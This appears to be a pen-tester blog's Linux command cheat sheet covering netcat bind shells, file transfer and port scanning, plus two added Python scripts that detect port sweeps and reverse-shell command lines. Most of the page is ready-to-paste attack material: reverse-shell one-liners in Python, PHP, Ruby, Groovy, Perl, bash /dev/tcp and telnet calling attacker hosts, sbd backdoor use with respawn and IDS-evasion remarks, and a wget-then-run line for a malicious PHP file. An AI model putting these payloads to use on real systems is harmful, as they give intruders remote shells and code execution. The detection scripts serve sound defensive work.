Linux Command Reference for Pen-testers
This part of the blog is dedicated to Linux and Unix-like commands that Penetration Testers and Information Security Administrators can use. On this page I will periodically post small Linux scripts and commands that a penetration tester or a security administrator can use to:
1. Perform security administration tasks (e.g. use Windows/Linux netcat to bind shells, etc.).
2. Run vulnerability scans (e.g. identify null sessions, test for LANMAN services, etc.).
3. Do pivoting (e.g. after compromising a machine, use Windows tools to escalate, etc.).
Using Netcat to Bind Shell
Launching a listening shell in Windows and connecting to it from Linux:
nc.exe -L -p <listening port> -e cmd.exe - Run in the Windows box
nc <windows box ip> <windows port> - Run in the Linux/Unix-like box
Launching a listening shell in Linux/Unix-like and connecting to it from Windows:
nc -l -p <listening port> -e /bin/sh - Run in the Linux/Unix-like box
nc.exe <linux box ip> <linux port> - Run in the Windows box
This can be used to transfer any type of file from Linux to Windows (the receiving side listens, the sending side pipes the file in):
nc.exe -lvvp 4444 > output.txt - Run in the Windows box
cat input.txt | nc -vv 192.168.8.74 4444 - Run in the Linux/Unix-like box
This can be used to transfer any type of file from Windows to Linux:
nc -lvvp 4444 > output.exe - Run in the Linux box
type input.exe | nc.exe -vv <linux box ip> 4444 - Run in the Windows box
Note: You might want to run the file command to identify the type of the file you want to transfer. There is no difference between transferring binary and text files (most of the time).
Using Netcat for port scanning
nc -v -n -z -w 1 192.168.1.2 1-1000 - Run from the Linux/Unix-like box
nc.exe -v -n -z -w 1 192.168.1.2 1-1000 - Run from the Windows box
Note: The "-n" parameter here prevents DNS lookups, "-z" puts nc in zero-I/O mode so it sends and receives no data and only reports whether each connection succeeds, and "-w 1" makes a connection time out after 1 second of inactivity. The commands above will scan from port 1 to 1000.
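The sweep above is noisy from the defender's side: one source sends a SYN to hundreds of distinct ports on one host within a few seconds. As an added example (not code from the original post), the script below flags that pattern in firewall logs. The log lines are constructed to resemble iptables LOG output (SRC=, DST=, PROTO=TCP, DPT= fields); the host name, addresses, ports and timestamps are made up, and the window and threshold are assumptions you would tune.

```python
"""Flag netcat-style port sweeps (nc -z -w 1 <host> 1-1000) in firewall
connection logs: one source touching many distinct ports on one host
within a short window.

Added example for this page, not code from the original post. The log
lines are constructed to resemble iptables LOG output; nothing here is
taken from a real system.
"""
import re
from collections import defaultdict
from datetime import datetime

# Fields we need from an iptables-style kernel log line.
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d+ \d\d:\d\d:\d\d) \S+ kernel: .*?"
    r"SRC=(?P<src>\d+(?:\.\d+){3}) DST=(?P<dst>\d+(?:\.\d+){3}) .*?"
    r"PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)


def parse_line(line, year=2024):
    """Return (timestamp, src, dst, dport) for a TCP log line, else None.
    Syslog timestamps carry no year, so one is supplied (assumed 2024)."""
    m = LOG_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["src"], m["dst"], int(m["dpt"])


def detect_port_sweeps(lines, window_seconds=10, min_ports=20):
    """Return {(src, dst): max_distinct_ports} for every src/dst pair that
    touched at least `min_ports` distinct TCP ports within `window_seconds`."""
    events = defaultdict(list)  # (src, dst) -> [(timestamp, dport), ...]
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, dst, dpt = parsed
            events[(src, dst)].append((ts, dpt))

    alerts = {}
    for key, evs in events.items():
        evs.sort()
        left = 0
        for right in range(len(evs)):
            # Slide the window so it spans at most window_seconds.
            while (evs[right][0] - evs[left][0]).total_seconds() > window_seconds:
                left += 1
            distinct = len({port for _, port in evs[left:right + 1]})
            if distinct >= min_ports:
                alerts[key] = max(alerts.get(key, 0), distinct)
    return alerts


def _log(ts, src, dst, dpt, spt):
    # Constructed line in the shape of an iptables LOG rule entry.
    return (f"{ts} gw kernel: [1234.5678] IN=eth0 OUT= SRC={src} DST={dst} "
            f"LEN=60 TTL=64 PROTO=TCP SPT={spt} DPT={dpt} WINDOW=29200 SYN URGP=0")


# Constructed sample: 192.168.1.50 sweeps ports 1-30 of 192.168.1.2 in
# three seconds; 192.168.1.77 makes three ordinary HTTPS connections;
# one unrelated sshd line shows the parser ignoring non-firewall entries.
SAMPLE_LINES = (
    [_log(f"Jan 12 10:00:{i // 10:02d}", "192.168.1.50", "192.168.1.2", port, 40000 + port)
     for i, port in enumerate(range(1, 31))]
    + [_log(f"Jan 12 10:00:{s:02d}", "192.168.1.77", "192.168.1.2", 443, 51000 + s)
       for s in (0, 15, 30)]
    + ["Jan 12 10:00:31 gw sshd[812]: Accepted publickey for ops from 192.168.1.77 port 51031"]
)

if __name__ == "__main__":
    for (src, dst), n in detect_port_sweeps(SAMPLE_LINES).items():
        print(f"possible port sweep: {src} -> {dst}, {n} distinct ports within 10s")
```

The threshold counts distinct destination ports rather than raw connection attempts, so a busy legitimate client hammering one service port never trips it, while a "-w 1" sweep that gets mostly refused connections still does, because each SYN is logged whether or not the port is open.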
Using Python to get shell
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Using PHP to get shell
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Using Ruby to get shell
This one-liner connects back to 10.0.0.1 on port 1234 and attaches /bin/sh to the socket (good when Ruby is installed on the victim machine):
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Using Java to get shell
The following snippet (Groovy syntax, hence the "as String[]" cast) connects back to 10.0.0.1 on port 2002 and runs each line it receives through bash:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Using Perl to get shell
A short Perl reverse shell that does not depend on /bin/sh:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
If the target system is running Windows use the following one-liner:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Alternatives to Bash Shell
Here are some tricks taken from Damele's blog to play with.
exec /bin/bash 0&0 2>&0
Or:
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
Or:
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
Using Telnet to get shell
Of course, you can also use Telnet as an alternative for Netcat:
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p
Or:
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445
Note: Remember to listen on your machine on port 4445/tcp as well.
Using sbd to get shell
An article on http://www.secureit.co.il discussed the availability of sbd (Shadowinteger's Backdoor), available at http://cycom.se/dl/sbd. It is described as a 'Netcat-clone, designed to be portable and offer strong encryption'. It supports AES-128 encryption and is available on most platforms, including win32 and Linux.
Command with no encryption for listening in Windows: sbd.exe -l -p 5555 -c off
Command with encryption for listening in Windows: sbd.exe -l -p 5555 -c on
Binding a shell on a Windows machine with encryption: sbd.exe -l -p 5555 -c on -e cmd.exe
Binding a shell on a Windows machine without encryption: sbd.exe -l -p 5555 -c off -e cmd.exe
Command with no encryption for connecting to Windows from Linux: sbd 192.168.11.21 5555 -c off
Command with encryption for connecting to Windows from Linux: sbd 192.168.1.21 5555 -c on
This command will monitor traffic at the server side: sbd -m on -r 0 -l -p 100 -e cmd.exe
This command will set up a port forward: sbd 127.0.0.1 2000 | cmd.exe | sbd 127.0.0.1 3000
This command will perform a connection forward: sbd -vv -l -p 90 | sbd -c off www.radarhack.com 80
Note: The reverse shell example shows that a sound firewall configuration in the outbound direction is necessary. In the scenario where a Trojan can be installed on a webserver, it is very important to prevent that server from connecting back out of the network, which would hand the attacker a shell.
Using sbd to transfer file
For file receiving in Windows the command is: sbd.exe -l -p 5555 > output.txt
For file sending in Linux the command is: cat input.txt | sbd 192.168.11.21 5555
Note: There is no difference between transferring an executable and a plain text file.
Using sbd to respawn the shell
Another interesting feature of sbd is the -r option, which lets you respawn the shell. From the moment the client disconnects, the server side exits. To respawn the server, specify the '-r seconds' switch: the server will be listening again after the specified amount of time. This keeps the backdoor from exiting for good, so the client can reconnect. Specifying a time of 0 seconds respawns the server immediately.
Here is a typical interaction with sbd respawning the shell after the connection is dropped:
sbd -r 8 f -P server -l -p 100
demolisher: test1
demolisher: test2
sbd -P demolisher 127.0.0.1 100
test1
^C
sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED
sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED
... after 8 seconds ....
sbd -P demolisher 127.0.0.1 100
test2
After evaluating (or playing, in other words), the tool seems very useful and easy to use. It has (much) fewer features than netcat, although it offers built-in encryption, which can be useful to avoid IDS/IPS systems, although some will detect malicious behavior if used on well-known ports.
Useful commands for copy paste
nc <attacker_ip> <port> -e /bin/bash
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php
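Every one-liner on this page, from the Python/PHP/Ruby/Java/Perl shells through the bash /dev/tcp tricks, the telnet and mknod back-pipes, netcat and sbd with -e, down to this copy-paste list, shares a small set of command-line shapes that a process snapshot or audit EXECVE record exposes. As an added example (not code from the original post), the script below triages process records against those shapes. The process records are constructed, the rule names and the service-account list are my own, and the placeholders from the list above are filled with the page's own 10.0.0.1/attackerip values.

```python
"""Triage process command lines for the reverse-shell patterns shown on
this page. Added example, not code from the original post; the process
records are constructed and the rule names are my own choices."""
import re

# Each rule is (name, regex). Patterns key on the combination that makes
# a command line a shell-over-socket, not on single tokens such as "nc".
RULES = [
    ("bash-dev-tcp", re.compile(r"/dev/tcp/")),
    ("nc-exec", re.compile(r"\bnc(?:\.exe)?\b[^|;]*\s-e\s")),
    ("fifo-backpipe", re.compile(r"\b(?:mknod\s+\S+\s+p|mkfifo\s+\S+)\b")),
    ("telnet-pipe-shell", re.compile(r"\btelnet\b.*\|\s*/bin/(?:ba)?sh\b")),
    ("python-socket-shell", re.compile(r"socket\.socket\(.*os\.dup2\(.*(?:subprocess|pty)")),
    ("php-fsockopen-exec", re.compile(r"fsockopen\(.*\b(?:exec|system|proc_open|popen)\(")),
    ("ruby-tcpsocket-exec", re.compile(r"TCPSocket\.open\(.*\bexec\b")),
    ("perl-socket-shell", re.compile(r"IO::Socket::INET\(.*\b(?:system|exec)\b")),
    ("sbd-exec", re.compile(r"\bsbd(?:\.exe)?\b.*\s-e\s")),
]

# Accounts that should never spawn an interactive shell; a hit under one of
# these is the webserver-trojan scenario from the sbd note above. (Assumed list.)
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "tomcat", "mysql", "postgres"}


def classify(cmdline):
    """Names of every rule the command line matches (empty list if clean)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(records):
    """records: iterable of {"pid", "user", "cmdline"} dicts, as a process
    snapshot would give. Returns the flagged ones with rules and severity."""
    flagged = []
    for rec in records:
        hits = classify(rec["cmdline"])
        if hits:
            flagged.append({
                "pid": rec["pid"],
                "user": rec["user"],
                "rules": hits,
                "severity": "high" if rec["user"] in SERVICE_ACCOUNTS else "medium",
            })
    return flagged


# Constructed snapshot: the page's one-liners alongside benign look-alikes
# (a health-check nc -z and a harmless python socket call).
SAMPLE_PROCESSES = [
    {"pid": 1201, "user": "ops", "cmdline": "nc -v -n -z -w 1 192.168.1.2 1-1000"},
    {"pid": 1337, "user": "www-data",
     "cmdline": "/bin/sh -c bash -i > /dev/tcp/10.0.0.1/4444 0<&1 2>&1"},
    {"pid": 1402, "user": "www-data",
     "cmdline": "python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,"
                "socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0);"
                "os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])"},
    {"pid": 1510, "user": "ops", "cmdline": "python3 -c import socket; print(socket.gethostname())"},
    {"pid": 1622, "user": "tomcat",
     "cmdline": "mknod backpipe p; nc 10.0.0.1 4444 0<backpipe | /bin/bash 1>backpipe"},
    {"pid": 1811, "user": "ops",
     "cmdline": "telnet attackerip 4444 | /bin/bash | telnet attackerip 4445"},
    {"pid": 1920, "user": "www-data",
     "cmdline": "php -r $sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");"},
    {"pid": 2044, "user": "alice", "cmdline": "nc -z -w 1 db.internal 5432"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_PROCESSES):
        print(f"[{hit['severity']}] pid {hit['pid']} ({hit['user']}): {', '.join(hit['rules'])}")
```

The rules deliberately require the pairing that makes a shell (a socket plus an exec, a fifo plus a pipe into a shell) instead of flagging every nc or python invocation, which is why the port-sweep and the gethostname() lines pass clean; the severity bump for service accounts reflects the page's own point that a webserver account opening an outbound interactive shell is the case an egress firewall and this kind of check both exist to catch.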
References:
http://pentestmonkey.net
http://wikipedia.org